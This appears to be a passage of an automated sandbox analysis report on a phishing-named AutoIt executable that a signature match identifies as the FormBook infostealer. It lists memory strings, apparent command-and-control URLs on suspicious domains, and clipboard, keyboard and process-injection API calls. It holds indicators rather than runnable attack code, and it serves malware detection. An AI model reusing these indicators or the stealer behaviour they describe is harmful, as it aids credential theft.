              Source: cmdkey.exe, 00000003.00000002.15247546664.00000000050E8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006C56000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
              Source: RAVCpl64.exe, 00000002.00000002.16205103694.000000000349E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou
              Source: RAVCpl64.exe, 00000002.00000002.16205103694.000000000349E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ogbos88.cyou/kj1o/
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.zbywl.com/js.js
              Source: cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.chiro.live/
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: b427-I_1.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006F7A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000045EA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11916406824.00000000031CD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031C3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031CF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000318D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000318D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
              Source: cmdkey.exe, 00000003.00000003.11910170497.000000000805F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007754000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004DC4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogbos88vip.click
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
              Source: cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
              Source: cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: cmdkey.exe, 00000003.00000002.15247546664.000000000559E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpd
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
              Source: RAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006AEAFF
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006AED6A
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006AEAFF
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0069AA57
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_006C9576

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Binary is likely a compiled AutoIt script file
              Source: QUOTATION#070125-ELITE MARINE .exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_30f9ef9f-d
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4e62391a-c
              Source: QUOTATION#070125-ELITE MARINE .exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fd81b81b-c
              Source: QUOTATION#070125-ELITE MARINE .exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_de904bce-c
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: QUOTATION#070125-ELITE MARINE .exe
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA33 NtClose,1_2_0042CA33
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B90 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BC0 NtQueryInformationToken,LdrInitializeThunk,1_2_03972BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972A80 NtClose,LdrInitializeThunk,1_2_03972A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EB0 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03972EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972D10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039734E0 NtCreateMutant,LdrInitializeThunk,1_2_039734E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974260 NtSetContextThread,1_2_03974260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974570 NtSuspendThread,1_2_03974570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtCreateKey,1_2_03972B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryVirtualMemory,1_2_03972BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B10 NtAllocateVirtualMemory,1_2_03972B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B00 NtQueryValueKey,1_2_03972B00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B20 NtQueryInformationProcess,1_2_03972B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AA0 NtQueryInformationFile,1_2_03972AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AC0 NtEnumerateValueKey,1_2_03972AC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972A10 NtWriteFile,1_2_03972A10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039729D0 NtWaitForSingleObject,1_2_039729D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039729F0 NtReadFile,1_2_039729F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtSetValueKey,1_2_03972FB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F00 NtCreateFile,1_2_03972F00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtOpenDirectoryObject,1_2_03972F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtCreateProcessEx,1_2_03972E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972ED0 NtResumeThread,1_2_03972ED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EC0 NtQuerySection,1_2_03972EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E00 NtQueueApcThread,1_2_03972E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E50 NtCreateSection,1_2_03972E50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DA0 NtReadVirtualMemory,1_2_03972DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DC0 NtAdjustPrivilegesToken,1_2_03972DC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D50 NtWriteVirtualMemory,1_2_03972D50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CD0 NtEnumerateKey,1_2_03972CD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtDelayExecution,1_2_03972CF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C10 NtOpenProcess,1_2_03972C10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C30 NtMapViewOfSection,1_2_03972C30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C20 NtSetInformationFile,1_2_03972C20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C50 NtUnmapViewOfSection,1_2_03972C50
